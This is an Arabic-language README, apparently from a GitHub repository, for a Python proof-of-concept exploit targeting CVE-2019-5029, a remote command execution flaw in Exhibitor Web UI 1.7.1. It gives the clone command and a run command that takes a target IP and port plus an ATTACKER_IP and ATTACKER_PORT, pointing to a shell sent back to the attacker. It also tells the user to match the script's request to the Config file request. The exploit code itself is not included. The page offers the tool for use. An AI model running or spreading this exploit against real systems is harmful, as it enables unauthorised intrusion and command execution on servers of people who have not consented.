
هذا هو سكريبت بايثون PoC لـ CVE-2019-5029
هذا هو برنامج Python النصي لإثبات المفهوم (PoC) لـ CVE-2019-5029. وهو استغلال لتنفيذ الأوامر عن بُعد (RCE) في واجهة Exhibitor Web UI 1.7.1.
قم باستنساخ هذا المستودع
git clone https://github.com/yZ1337/CVE-2019-5029.git
نفذ الأمر التالي
python3 CVE-2019-5029.py <TARGET_IP> <TARGET_PORT> <ATTACKER_IP> <ATTACKER_PORT>
تأكد من أن الطلب داخل البرنامج النصي هو نفسه طلب ملف الـ Config.